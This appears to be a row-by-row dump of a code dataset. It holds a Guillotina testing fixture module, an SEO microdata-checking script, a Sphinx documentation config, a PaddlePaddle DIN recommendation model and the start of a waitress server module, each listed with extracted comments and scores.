"guillotina.behaviors.dublincore.IDublinCore"
]
), 'contenttype')
@configure.service(
context=IApplication, method='GET', permission='guillotina.AccessContent',
name='@raise-http-exception')
@configure.service(
context=IApplication, method='POST', permission='guillotina.AccessContent',
name='@raise-http-exception')
async def raise_http_exception(context, request):
raise HTTPUnprocessableEntity()
class ITestAsyncUtility(IAsyncUtility):
pass
@configure.utility(provides=ITestAsyncUtility)
class AsyncUtility:
def __init__(self, settings=None, loop=None):
self.state = 'init'
async def initialize(self):
self.state = 'initialize'
async def finalize(self):
self.state = 'finalize'
@configure.service(
context=IApplication, method='GET', permission='guillotina.AccessContent',
name='@match/{foo}/{bar}')
async def matching_service(context, request):
return request.matchdict
@configure.adapter(
    for_=Interface,
    provides=IIDGenerator)
class IDGenerator(object):
    """
    Test id generator: picks an explicit id out of the request payload.

    Returns data['bad-id'] or data['custom-id'] when present; otherwise
    falls through and implicitly returns None, letting the caller
    generate an id itself.
    """
    def __init__(self, request):
        self.request = request
    def __call__(self, data):
        # 'bad-id' takes precedence so tests can force an invalid id.
        if 'bad-id' in data:
            return data['bad-id']
        if 'custom-id' in data:
            return data['custom-id']
        # No explicit id requested -> implicit None.
class IMemoryFileField(IFileField):
"""
"""
class IInMemoryCloudFile(IFile):
"""
"""
@configure.adapter(
for_=(dict, IMemoryFileField),
provides=IJSONToValue)
def dictfile_converter(value, field):
return MemoryFile(**value)
@implementer(IInMemoryCloudFile)
class MemoryFile(BaseCloudFile):
    """Test file value object backed by in-memory/tempfile storage.

    NOTE(review): the original docstring said "File stored in a GCloud" --
    that looks copied from the GCloud implementation; this class is the
    in-memory test double used by InMemoryFileManager.
    """
    # Number of chunks appended so far, and total size in bytes.
    _chunks = 0
    _size = 0
    @property
    def chunks(self):
        return self._chunks
    @property
    def size(self):
        return self._size
    @size.setter
    def size(self, val):
        self._size = val
_tmp_files: typing.Dict = {}
@configure.adapter(
for_=(IResource, IRequest, IMemoryFileField),
provides=IExternalFileStorageManager)
class InMemoryFileManager:
file_class = MemoryFile
def __init__(self, context, request, field):
self.context = context
self.request = request
self.field = field
async def iter_data(self, uri=None):
if uri is None:
file = self.field.get(self.field.context or self.context)
uri = file.uri
with open(_tmp_files[uri], 'rb') as fi:
chunk = fi.read(1024)
while chunk:
yield chunk
chunk = fi.read(1024)
async def start(self, dm):
upload_file_id = dm.get('upload_file_id')
if upload_file_id is not None:
await self.delete_upload(upload_file_id)
upload_file_id = generate_key(self.context)
_tmp_files[upload_file_id] = tempfile.mkstemp()[1]
await dm.update(
_chunks=0,
upload_file_id=upload_file_id
)
async def delete_upload(self, uri):
if uri in _tmp_files:
if os.path.exists(_tmp_files[uri]):
os.remove(_tmp_files[uri])
del _tmp_files[uri]
async def append(self, dm, iterable, offset) -> int:
count = 0
file_id = dm.get('upload_file_id')
chunk_count = dm.get('_chunks')
with open(_tmp_files[file_id], 'ab') as fi:
async for chunk in iterable:
if chunk:
fi.write(chunk)
count += len(chunk)
chunk_count += 1
await dm.update(_chunks=chunk_count)
return count
async def finish(self, dm):
await dm.update(
uri=dm.get('upload_file_id'),
upload_file_id=None
)
async def exists(self):
file = self.field.get(self.field.context or self.context)
return file.uri in _tmp_files and os.path.exists(_tmp_files[file.uri])
async def copy(self, to_storage_manager, to_dm):
file = self.field.get(self.field.context or self.context)
new_uri = generate_key(self.context)
_tmp_files[new_uri] = _tmp_files[file.uri]
_tmp_files[new_uri] = tempfile.mkstemp()[1]
copyfile(_tmp_files[file.uri], _tmp_files[new_uri])
await to_dm.finish(
values={
'content_type': file.content_type,
'size': file.size,
'uri': new_uri,
'filename': file.filename or 'unknown'
}
)
@implementer(IMemoryFileField)
class InMemoryFileField(Object):
    """Schema field whose values are MemoryFile objects.

    NOTE(review): the original docstring said "A NamedBlobFile field",
    which appears to be copied boilerplate; the stored type is MemoryFile.
    """
    _type = MemoryFile
    schema = IInMemoryCloudFile
    def __init__(self, **kw):
        # Allow callers to override the value schema via schema=...; pop it
        # so Object.__init__ does not receive the keyword twice.
        if 'schema' in kw:
            self.schema = kw.pop('schema')
        super(InMemoryFileField, self).__init__(schema=self.schema, **kw)
| # this is for testing.py, do not import into other modules
from guillotina import configure
from guillotina import schema
from guillotina.async_util import IAsyncUtility
from guillotina.behaviors.instance import AnnotationBehavior
from guillotina.behaviors.instance import ContextBehavior
from guillotina.behaviors.properties import ContextProperty
from guillotina.content import Item
from guillotina.content import Resource
from guillotina.directives import index_field
from guillotina.directives import metadata
from guillotina.directives import write_permission
from guillotina.exceptions import NoIndexField
from guillotina.fields import CloudFileField
from guillotina.files import BaseCloudFile
from guillotina.files.utils import generate_key
from guillotina.interfaces import IApplication
from guillotina.interfaces import IContainer
from guillotina.interfaces import IExternalFileStorageManager
from guillotina.interfaces import IFile
from guillotina.interfaces import IFileField
from guillotina.interfaces import IIDGenerator
from guillotina.interfaces import IItem
from guillotina.interfaces import IJSONToValue
from guillotina.interfaces import IObjectAddedEvent
from guillotina.interfaces import IRequest
from guillotina.interfaces import IResource
from guillotina.response import HTTPUnprocessableEntity
from guillotina.schema import Object
from guillotina.schema.interfaces import IContextAwareDefaultFactory
from shutil import copyfile
from zope.interface import implementer
from zope.interface import Interface
import json
import os
import tempfile
import typing
app_settings = {
'applications': ['guillotina']
}
TERM_SCHEMA = json.dumps({
'type': 'object',
'properties': {
'label': {'type': 'string'},
'number': {'type': 'number'}
},
})
@implementer(IContextAwareDefaultFactory)
class ContextDefaultFactory:
def __call__(self, context):
return 'foobar'
CATEGORIES_MAPPING = {
'dynamic': False,
'type': 'nested',
}
class IExample(IResource):
metadata('categories')
index_field('boolean_field', type='boolean')
boolean_field = schema.Bool(required=False)
index_field('categories', field_mapping=CATEGORIES_MAPPING)
categories = schema.List(
title='categories',
default=[],
value_type=schema.JSONField(
title='term',
schema=TERM_SCHEMA)
)
textline_field = schema.TextLine(
title='kk', widget='testing', required=False)
text_field = schema.Text(required=False)
dict_value = schema.Dict(
key_type=schema.TextLine(),
value_type=schema.TextLine(),
required=False
)
datetime = schema.Datetime(required=False)
write_permission(write_protected='example.MyPermission')
write_protected = schema.TextLine(
title='Write protected field',
required=False,
)
default_factory_test = schema.Text(
defaultFactory=lambda: 'foobar'
)
context_default_factory_test = schema.Text(
defaultFactory=ContextDefaultFactory()
)
@index_field.with_accessor(
IExample, 'categories_accessor', field='categories')
def categories_index_accessor(ob):
if not ob.categories:
raise NoIndexField
else:
return [
c['label'] for c in ob.categories
]
@index_field.with_accessor(IExample, 'foobar_accessor')
def foobar_accessor(ob):
return 'foobar'
configure.permission('example.MyPermission', 'example permission')
@implementer(IExample)
class Example(Resource):
pass
class IMarkerBehavior(Interface):
pass
class ITestBehavior(Interface):
foobar = schema.TextLine(required=False)
foobar_context = schema.TextLine(required=False, default='default-foobar')
@configure.behavior(
title="",
provides=ITestBehavior,
marker=IMarkerBehavior,
for_="guillotina.interfaces.IResource")
class GTestBehavior(AnnotationBehavior):
foobar_context = ContextProperty('foobar_context')
class ITestContextBehavior(Interface):
foobar = schema.TextLine()
class IMarkerTestContextBehavior(Interface):
pass
@configure.behavior(
title="",
provides=ITestContextBehavior,
marker=IMarkerTestContextBehavior,
for_="guillotina.interfaces.IResource")
class GContextTestBehavior(ContextBehavior):
pass
class ITestNoSerializeBehavior(Interface):
foobar = schema.TextLine()
@configure.behavior(
title="",
provides=ITestNoSerializeBehavior,
for_="guillotina.interfaces.IResource")
class GTestNoSerializeBehavior(ContextBehavior):
auto_serialize = False
class IFileContent(IItem):
file = CloudFileField(required=False)
@configure.contenttype(
schema=IFileContent, type_name="File",
behaviors=[
"guillotina.behaviors.dublincore.IDublinCore"
])
class FileContent(Item):
pass
@configure.subscriber(
for_=(IFileContent, IObjectAddedEvent), priority=-1000)
async def foobar_sub(ob, evt):
pass
@configure.subscriber(
for_=(IResource, IObjectAddedEvent), priority=-1000)
def sync_foobar_sub(ob, evt):
if not hasattr(evt, 'called'):
evt.called = 0
evt.called += 1
configure.register_configuration(Example, dict(
context=IContainer,
schema=IExample,
type_name="Example",
behaviors=[
"guillotina.behaviors.dublincore.IDublinCore"
]
), 'contenttype')
@configure.service(
context=IApplication, method='GET', permission='guillotina.AccessContent',
name='@raise-http-exception')
@configure.service(
context=IApplication, method='POST', permission='guillotina.AccessContent',
name='@raise-http-exception')
async def raise_http_exception(context, request):
raise HTTPUnprocessableEntity()
class ITestAsyncUtility(IAsyncUtility):
pass
@configure.utility(provides=ITestAsyncUtility)
class AsyncUtility:
def __init__(self, settings=None, loop=None):
self.state = 'init'
async def initialize(self):
self.state = 'initialize'
async def finalize(self):
self.state = 'finalize'
@configure.service(
context=IApplication, method='GET', permission='guillotina.AccessContent',
name='@match/{foo}/{bar}')
async def matching_service(context, request):
return request.matchdict
@configure.adapter(
for_=Interface,
provides=IIDGenerator)
class IDGenerator(object):
"""
Test id generator
"""
def __init__(self, request):
self.request = request
def __call__(self, data):
if 'bad-id' in data:
return data['bad-id']
if 'custom-id' in data:
return data['custom-id']
class IMemoryFileField(IFileField):
"""
"""
class IInMemoryCloudFile(IFile):
"""
"""
@configure.adapter(
for_=(dict, IMemoryFileField),
provides=IJSONToValue)
def dictfile_converter(value, field):
return MemoryFile(**value)
@implementer(IInMemoryCloudFile)
class MemoryFile(BaseCloudFile):
"""File stored in a GCloud, with a filename."""
_chunks = 0
_size = 0
@property
def chunks(self):
return self._chunks
@property
def size(self):
return self._size
@size.setter
def size(self, val):
self._size = val
_tmp_files: typing.Dict = {}
@configure.adapter(
for_=(IResource, IRequest, IMemoryFileField),
provides=IExternalFileStorageManager)
class InMemoryFileManager:
file_class = MemoryFile
def __init__(self, context, request, field):
self.context = context
self.request = request
self.field = field
async def iter_data(self, uri=None):
if uri is None:
file = self.field.get(self.field.context or self.context)
uri = file.uri
with open(_tmp_files[uri], 'rb') as fi:
chunk = fi.read(1024)
while chunk:
yield chunk
chunk = fi.read(1024)
async def start(self, dm):
upload_file_id = dm.get('upload_file_id')
if upload_file_id is not None:
await self.delete_upload(upload_file_id)
upload_file_id = generate_key(self.context)
_tmp_files[upload_file_id] = tempfile.mkstemp()[1]
await dm.update(
_chunks=0,
upload_file_id=upload_file_id
)
async def delete_upload(self, uri):
if uri in _tmp_files:
if os.path.exists(_tmp_files[uri]):
os.remove(_tmp_files[uri])
del _tmp_files[uri]
async def append(self, dm, iterable, offset) -> int:
count = 0
file_id = dm.get('upload_file_id')
chunk_count = dm.get('_chunks')
with open(_tmp_files[file_id], 'ab') as fi:
async for chunk in iterable:
if chunk:
fi.write(chunk)
count += len(chunk)
chunk_count += 1
await dm.update(_chunks=chunk_count)
return count
async def finish(self, dm):
await dm.update(
uri=dm.get('upload_file_id'),
upload_file_id=None
)
async def exists(self):
file = self.field.get(self.field.context or self.context)
return file.uri in _tmp_files and os.path.exists(_tmp_files[file.uri])
async def copy(self, to_storage_manager, to_dm):
file = self.field.get(self.field.context or self.context)
new_uri = generate_key(self.context)
_tmp_files[new_uri] = _tmp_files[file.uri]
_tmp_files[new_uri] = tempfile.mkstemp()[1]
copyfile(_tmp_files[file.uri], _tmp_files[new_uri])
await to_dm.finish(
values={
'content_type': file.content_type,
'size': file.size,
'uri': new_uri,
'filename': file.filename or 'unknown'
}
)
@implementer(IMemoryFileField)
class InMemoryFileField(Object):
"""A NamedBlobFile field."""
_type = MemoryFile
schema = IInMemoryCloudFile
def __init__(self, **kw):
if 'schema' in kw:
self.schema = kw.pop('schema')
super(InMemoryFileField, self).__init__(schema=self.schema, **kw)
| en | 0.721817 | # this is for testing.py, do not import into other modules Test id generator File stored in a GCloud, with a filename. A NamedBlobFile field. | 1.609483 | 2 |
apps/indicators/micro.py | suenklerhaw/seoeffekt | 1 | 6614033 | #script to check micro data
#include libs
import sys
sys.path.insert(0, '..')
from include import *
micro_file = '../../evaluations/micro.csv'
today = date.today()
def get_micros():
micros_list = []
with open(micro_file, 'r') as csvfile:
micros = csv.reader(csvfile)
for m in micros:
modul = m[0]
pattern = m[1]
item = (modul, pattern)
micros_list.append(item)
return micros_list
def micros(hash, html_comments, html_source):
micros_list = get_micros()
micros_save = []
for ms in micros_list:
obj = ms[0]
pattern = ms[1]
for comment in html_comments:
if(len(comment) < 3000):
if Helpers.matchText(comment, pattern):
micros_save.append([obj])
for s in html_source:
if(len(s) < 3000):
if Helpers.matchText(s, pattern):
micros_save.append([obj])
micros_save = Helpers.remove_duplicates_from_list(micros_save)
res = ''
if(len(micros_save) == 0):
module = 'micros'
value = '0'
check_evaluations_result(hash, module, value)
module = 'micros counter'
value = '0'
check_evaluations_result(hash, module, value)
else:
for m in micros_save:
res = '#'+res+m[0]
module = 'micros'
check_evaluations_result(hash, module, res)
module = 'micros counter'
value = len(micros_save)
value = str(value)
check_evaluations_result(hash, module, value)
| #script to check micro data
#include libs
import sys
sys.path.insert(0, '..')
from include import *
micro_file = '../../evaluations/micro.csv'
today = date.today()
def get_micros():
micros_list = []
with open(micro_file, 'r') as csvfile:
micros = csv.reader(csvfile)
for m in micros:
modul = m[0]
pattern = m[1]
item = (modul, pattern)
micros_list.append(item)
return micros_list
def micros(hash, html_comments, html_source):
micros_list = get_micros()
micros_save = []
for ms in micros_list:
obj = ms[0]
pattern = ms[1]
for comment in html_comments:
if(len(comment) < 3000):
if Helpers.matchText(comment, pattern):
micros_save.append([obj])
for s in html_source:
if(len(s) < 3000):
if Helpers.matchText(s, pattern):
micros_save.append([obj])
micros_save = Helpers.remove_duplicates_from_list(micros_save)
res = ''
if(len(micros_save) == 0):
module = 'micros'
value = '0'
check_evaluations_result(hash, module, value)
module = 'micros counter'
value = '0'
check_evaluations_result(hash, module, value)
else:
for m in micros_save:
res = '#'+res+m[0]
module = 'micros'
check_evaluations_result(hash, module, res)
module = 'micros counter'
value = len(micros_save)
value = str(value)
check_evaluations_result(hash, module, value)
| en | 0.392964 | #script to check micro data #include libs | 2.898424 | 3 |
docs/conf.py | kamilazdybal/multipy | 0 | 6614034 | <filename>docs/conf.py
# -- Path setup --------------------------------------------------------------
import os
import sys
sys.path.insert(0, os.path.abspath('../multipy/'))
# -- Project information -----------------------------------------------------
project = 'multipy'
copyright = '2021-2022, <NAME>, <NAME>'
author = '<NAME>, <NAME>'
release = '1.0.0'
extensions = [
"sphinx.ext.autodoc",
]
autosectionlabel_prefix_document = True
templates_path = ['_templates']
source_suffix = '.rst'
master_doc = 'index'
language = 'English'
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
pygments_style = 'sphinx'
html_static_path = []
# import jupyter_sphinx_theme
# html_theme = "jupyter"
# html_sidebars = {'**': ['sidebartoc.html']}
# html_theme_path = jupyter_sphinx_theme.get_html_theme_path()
html_theme = "furo"
html_logo = "images/multipy-logo.svg"
html_theme_options = {
"dark_css_variables": {
"color-problematic": "#b30000",
"color-foreground-primary": "black",
"color-foreground-secondary": "#5a5c63",
"color-foreground-muted": "#72747e",
"color-foreground-border": "#878787",
"color-background-primary": "white",
"color-background-secondary": "#f8f9fb",
"color-background-hover": "#efeff4ff",
"color-background-hover--transparent": "#efeff400",
"color-background-border": "#eeebee",
"color-inline-code-background": "#f2f2f2",
# Announcements
"color-announcement-background": "#000000dd",
"color-announcement-text": "#eeebee",
# Brand colors
"color-brand-primary": "#2962ff",
"color-brand-content": "#2a5adf",
# Highlighted text (search)
"color-highlighted-background": "#ddeeff",
# GUI Labels
"color-guilabel-background": "#ddeeff80",
"color-guilabel-border": "#bedaf580",
# API documentation
"color-api-highlight-on-target": "#ffffcc",
# Admonitions
"color-admonition-background": "transparent",
},
}
| <filename>docs/conf.py
# -- Path setup --------------------------------------------------------------
import os
import sys
sys.path.insert(0, os.path.abspath('../multipy/'))
# -- Project information -----------------------------------------------------
project = 'multipy'
copyright = '2021-2022, <NAME>, <NAME>'
author = '<NAME>, <NAME>'
release = '1.0.0'
extensions = [
"sphinx.ext.autodoc",
]
autosectionlabel_prefix_document = True
templates_path = ['_templates']
source_suffix = '.rst'
master_doc = 'index'
language = 'English'
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
pygments_style = 'sphinx'
html_static_path = []
# import jupyter_sphinx_theme
# html_theme = "jupyter"
# html_sidebars = {'**': ['sidebartoc.html']}
# html_theme_path = jupyter_sphinx_theme.get_html_theme_path()
html_theme = "furo"
html_logo = "images/multipy-logo.svg"
html_theme_options = {
"dark_css_variables": {
"color-problematic": "#b30000",
"color-foreground-primary": "black",
"color-foreground-secondary": "#5a5c63",
"color-foreground-muted": "#72747e",
"color-foreground-border": "#878787",
"color-background-primary": "white",
"color-background-secondary": "#f8f9fb",
"color-background-hover": "#efeff4ff",
"color-background-hover--transparent": "#efeff400",
"color-background-border": "#eeebee",
"color-inline-code-background": "#f2f2f2",
# Announcements
"color-announcement-background": "#000000dd",
"color-announcement-text": "#eeebee",
# Brand colors
"color-brand-primary": "#2962ff",
"color-brand-content": "#2a5adf",
# Highlighted text (search)
"color-highlighted-background": "#ddeeff",
# GUI Labels
"color-guilabel-background": "#ddeeff80",
"color-guilabel-border": "#bedaf580",
# API documentation
"color-api-highlight-on-target": "#ffffcc",
# Admonitions
"color-admonition-background": "transparent",
},
}
| en | 0.362554 | # -- Path setup -------------------------------------------------------------- # -- Project information ----------------------------------------------------- # import jupyter_sphinx_theme # html_theme = "jupyter" # html_sidebars = {'**': ['sidebartoc.html']} # html_theme_path = jupyter_sphinx_theme.get_html_theme_path() # Announcements # Brand colors # Highlighted text (search) # GUI Labels # API documentation # Admonitions | 1.545231 | 2 |
models/rank/din/net.py | Edouard87ljt5s/DisyInformationssysteme0 | 2 | 6614035 | <gh_stars>1-10
# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from paddle.nn import Conv1D
import paddle
import paddle.nn as nn
import math
import numpy as np
class DINLayer(nn.Layer):
def __init__(self, item_emb_size, cat_emb_size, act, is_sparse,
use_DataLoader, item_count, cat_count):
super(DINLayer, self).__init__()
self.item_emb_size = item_emb_size
self.cat_emb_size = cat_emb_size
self.act = act
self.is_sparse = is_sparse
self.use_DataLoader = use_DataLoader
self.item_count = item_count
self.cat_count = cat_count
self.hist_item_emb_attr = paddle.nn.Embedding(
self.item_count,
self.item_emb_size,
sparse=self.is_sparse,
weight_attr=paddle.framework.ParamAttr(
initializer=paddle.nn.initializer.XavierUniform()),
name="item_emb")
self.hist_cat_emb_attr = paddle.nn.Embedding(
self.cat_count,
self.cat_emb_size,
sparse=self.is_sparse,
weight_attr=paddle.framework.ParamAttr(
initializer=paddle.nn.initializer.XavierUniform()),
name="cat_emb")
self.target_item_emb_attr = paddle.nn.Embedding(
self.item_count,
self.item_emb_size,
sparse=self.is_sparse,
weight_attr=paddle.framework.ParamAttr(
initializer=paddle.nn.initializer.XavierUniform()),
name="item_emb")
self.target_cat_emb_attr = paddle.nn.Embedding(
self.cat_count,
self.cat_emb_size,
sparse=self.is_sparse,
weight_attr=paddle.framework.ParamAttr(
initializer=paddle.nn.initializer.XavierUniform()),
name="cat_emb")
self.target_item_seq_emb_attr = paddle.nn.Embedding(
self.item_count,
self.item_emb_size,
sparse=self.is_sparse,
weight_attr=paddle.framework.ParamAttr(
initializer=paddle.nn.initializer.XavierUniform()),
name="item_emb")
self.target_cat_seq_emb_attr = paddle.nn.Embedding(
self.cat_count,
self.cat_emb_size,
sparse=self.is_sparse,
weight_attr=paddle.framework.ParamAttr(
initializer=paddle.nn.initializer.XavierUniform()),
name="cat_emb")
self.item_b_attr = paddle.nn.Embedding(
self.item_count,
1,
sparse=self.is_sparse,
weight_attr=paddle.ParamAttr(
initializer=paddle.nn.initializer.Constant(value=0.0)))
self.attention_layer = []
sizes = [(self.item_emb_size + self.cat_emb_size) * 4
] + [80] + [40] + [1]
acts = ["sigmoid" for _ in range(len(sizes) - 2)] + [None]
for i in range(len(sizes) - 1):
linear = paddle.nn.Linear(
in_features=sizes[i],
out_features=sizes[i + 1],
weight_attr=paddle.framework.ParamAttr(
initializer=paddle.nn.initializer.XavierUniform()),
bias_attr=paddle.ParamAttr(
initializer=paddle.nn.initializer.Constant(value=0.0)))
self.add_sublayer('linear_%d' % i, linear)
self.attention_layer.append(linear)
if acts[i] == 'sigmoid':
act = paddle.nn.Sigmoid()
self.add_sublayer('act_%d' % i, act)
self.attention_layer.append(act)
self.con_layer = []
self.firInDim = self.item_emb_size + self.cat_emb_size
self.firOutDim = self.item_emb_size + self.cat_emb_size
linearCon = paddle.nn.Linear(
in_features=self.firInDim,
out_features=self.firOutDim,
weight_attr=paddle.framework.ParamAttr(
initializer=paddle.nn.initializer.XavierUniform()),
bias_attr=paddle.ParamAttr(
initializer=paddle.nn.initializer.Constant(value=0.0)))
self.add_sublayer('linearCon', linearCon)
self.con_layer.append(linearCon)
conDim = self.item_emb_size + self.cat_emb_size + self.item_emb_size + self.cat_emb_size
conSizes = [conDim] + [80] + [40] + [1]
conActs = ["sigmoid" for _ in range(len(conSizes) - 2)] + [None]
for i in range(len(conSizes) - 1):
linear = paddle.nn.Linear(
in_features=conSizes[i],
out_features=conSizes[i + 1],
weight_attr=paddle.framework.ParamAttr(
initializer=paddle.nn.initializer.XavierUniform()),
bias_attr=paddle.ParamAttr(
initializer=paddle.nn.initializer.Constant(value=0.0)))
self.add_sublayer('linear_%d' % i, linear)
self.con_layer.append(linear)
if conActs[i] == 'sigmoid':
act = paddle.nn.Sigmoid()
self.add_sublayer('act_%d' % i, act)
self.con_layer.append(act)
def forward(self, hist_item_seq, hist_cat_seq, target_item, target_cat,
label, mask, target_item_seq, target_cat_seq):
hist_item_emb = self.hist_item_emb_attr(hist_item_seq)
hist_cat_emb = self.hist_cat_emb_attr(hist_cat_seq)
target_item_emb = self.target_item_emb_attr(target_item)
target_cat_emb = self.target_cat_emb_attr(target_cat)
target_item_seq_emb = self.target_item_seq_emb_attr(target_item_seq)
target_cat_seq_emb = self.target_cat_seq_emb_attr(target_cat_seq)
item_b = self.item_b_attr(target_item)
hist_seq_concat = paddle.concat([hist_item_emb, hist_cat_emb], axis=2)
target_seq_concat = paddle.concat(
[target_item_seq_emb, target_cat_seq_emb], axis=2)
target_concat = paddle.concat(
[target_item_emb, target_cat_emb], axis=1)
concat = paddle.concat(
[
hist_seq_concat, target_seq_concat,
hist_seq_concat - target_seq_concat,
hist_seq_concat * target_seq_concat
],
axis=2)
for attlayer in self.attention_layer:
concat = attlayer(concat)
atten_fc3 = concat + mask
atten_fc3 = paddle.transpose(atten_fc3, perm=[0, 2, 1])
atten_fc3 = paddle.scale(atten_fc3, scale=self.firInDim**-0.5)
weight = paddle.nn.functional.softmax(atten_fc3)
output = paddle.matmul(weight, hist_seq_concat)
output = paddle.reshape(output, shape=[0, self.firInDim])
for firLayer in self.con_layer[:1]:
concat = firLayer(output)
embedding_concat = paddle.concat([concat, target_concat], axis=1)
for colayer in self.con_layer[1:]:
embedding_concat = colayer(embedding_concat)
logit = embedding_concat + item_b
return logit
| # Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from paddle.nn import Conv1D
import paddle
import paddle.nn as nn
import math
import numpy as np
class DINLayer(nn.Layer):
def __init__(self, item_emb_size, cat_emb_size, act, is_sparse,
use_DataLoader, item_count, cat_count):
super(DINLayer, self).__init__()
self.item_emb_size = item_emb_size
self.cat_emb_size = cat_emb_size
self.act = act
self.is_sparse = is_sparse
self.use_DataLoader = use_DataLoader
self.item_count = item_count
self.cat_count = cat_count
self.hist_item_emb_attr = paddle.nn.Embedding(
self.item_count,
self.item_emb_size,
sparse=self.is_sparse,
weight_attr=paddle.framework.ParamAttr(
initializer=paddle.nn.initializer.XavierUniform()),
name="item_emb")
self.hist_cat_emb_attr = paddle.nn.Embedding(
self.cat_count,
self.cat_emb_size,
sparse=self.is_sparse,
weight_attr=paddle.framework.ParamAttr(
initializer=paddle.nn.initializer.XavierUniform()),
name="cat_emb")
self.target_item_emb_attr = paddle.nn.Embedding(
self.item_count,
self.item_emb_size,
sparse=self.is_sparse,
weight_attr=paddle.framework.ParamAttr(
initializer=paddle.nn.initializer.XavierUniform()),
name="item_emb")
self.target_cat_emb_attr = paddle.nn.Embedding(
self.cat_count,
self.cat_emb_size,
sparse=self.is_sparse,
weight_attr=paddle.framework.ParamAttr(
initializer=paddle.nn.initializer.XavierUniform()),
name="cat_emb")
self.target_item_seq_emb_attr = paddle.nn.Embedding(
self.item_count,
self.item_emb_size,
sparse=self.is_sparse,
weight_attr=paddle.framework.ParamAttr(
initializer=paddle.nn.initializer.XavierUniform()),
name="item_emb")
self.target_cat_seq_emb_attr = paddle.nn.Embedding(
self.cat_count,
self.cat_emb_size,
sparse=self.is_sparse,
weight_attr=paddle.framework.ParamAttr(
initializer=paddle.nn.initializer.XavierUniform()),
name="cat_emb")
self.item_b_attr = paddle.nn.Embedding(
self.item_count,
1,
sparse=self.is_sparse,
weight_attr=paddle.ParamAttr(
initializer=paddle.nn.initializer.Constant(value=0.0)))
self.attention_layer = []
sizes = [(self.item_emb_size + self.cat_emb_size) * 4
] + [80] + [40] + [1]
acts = ["sigmoid" for _ in range(len(sizes) - 2)] + [None]
for i in range(len(sizes) - 1):
linear = paddle.nn.Linear(
in_features=sizes[i],
out_features=sizes[i + 1],
weight_attr=paddle.framework.ParamAttr(
initializer=paddle.nn.initializer.XavierUniform()),
bias_attr=paddle.ParamAttr(
initializer=paddle.nn.initializer.Constant(value=0.0)))
self.add_sublayer('linear_%d' % i, linear)
self.attention_layer.append(linear)
if acts[i] == 'sigmoid':
act = paddle.nn.Sigmoid()
self.add_sublayer('act_%d' % i, act)
self.attention_layer.append(act)
self.con_layer = []
self.firInDim = self.item_emb_size + self.cat_emb_size
self.firOutDim = self.item_emb_size + self.cat_emb_size
linearCon = paddle.nn.Linear(
in_features=self.firInDim,
out_features=self.firOutDim,
weight_attr=paddle.framework.ParamAttr(
initializer=paddle.nn.initializer.XavierUniform()),
bias_attr=paddle.ParamAttr(
initializer=paddle.nn.initializer.Constant(value=0.0)))
self.add_sublayer('linearCon', linearCon)
self.con_layer.append(linearCon)
conDim = self.item_emb_size + self.cat_emb_size + self.item_emb_size + self.cat_emb_size
conSizes = [conDim] + [80] + [40] + [1]
conActs = ["sigmoid" for _ in range(len(conSizes) - 2)] + [None]
for i in range(len(conSizes) - 1):
linear = paddle.nn.Linear(
in_features=conSizes[i],
out_features=conSizes[i + 1],
weight_attr=paddle.framework.ParamAttr(
initializer=paddle.nn.initializer.XavierUniform()),
bias_attr=paddle.ParamAttr(
initializer=paddle.nn.initializer.Constant(value=0.0)))
self.add_sublayer('linear_%d' % i, linear)
self.con_layer.append(linear)
if conActs[i] == 'sigmoid':
act = paddle.nn.Sigmoid()
self.add_sublayer('act_%d' % i, act)
self.con_layer.append(act)
def forward(self, hist_item_seq, hist_cat_seq, target_item, target_cat,
label, mask, target_item_seq, target_cat_seq):
hist_item_emb = self.hist_item_emb_attr(hist_item_seq)
hist_cat_emb = self.hist_cat_emb_attr(hist_cat_seq)
target_item_emb = self.target_item_emb_attr(target_item)
target_cat_emb = self.target_cat_emb_attr(target_cat)
target_item_seq_emb = self.target_item_seq_emb_attr(target_item_seq)
target_cat_seq_emb = self.target_cat_seq_emb_attr(target_cat_seq)
item_b = self.item_b_attr(target_item)
hist_seq_concat = paddle.concat([hist_item_emb, hist_cat_emb], axis=2)
target_seq_concat = paddle.concat(
[target_item_seq_emb, target_cat_seq_emb], axis=2)
target_concat = paddle.concat(
[target_item_emb, target_cat_emb], axis=1)
concat = paddle.concat(
[
hist_seq_concat, target_seq_concat,
hist_seq_concat - target_seq_concat,
hist_seq_concat * target_seq_concat
],
axis=2)
for attlayer in self.attention_layer:
concat = attlayer(concat)
atten_fc3 = concat + mask
atten_fc3 = paddle.transpose(atten_fc3, perm=[0, 2, 1])
atten_fc3 = paddle.scale(atten_fc3, scale=self.firInDim**-0.5)
weight = paddle.nn.functional.softmax(atten_fc3)
output = paddle.matmul(weight, hist_seq_concat)
output = paddle.reshape(output, shape=[0, self.firInDim])
for firLayer in self.con_layer[:1]:
concat = firLayer(output)
embedding_concat = paddle.concat([concat, target_concat], axis=1)
for colayer in self.con_layer[1:]:
embedding_concat = colayer(embedding_concat)
logit = embedding_concat + item_b
return logit | en | 0.85686 | # Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. | 1.987767 | 2 |
minipylib/server/backends/waitress_server.py | kefin/minipylib | 0 | 6614036 | # -*- coding: utf-8 -*-
"""
minipylib.server.backends.waitress_server
Define a wsgi server object based on waitress.
"""
# created: 2014-08-30 <NAME> <<EMAIL>>
# updated: 2014-08-30 kchan
from __future__ import (absolute_import, unicode_literals)
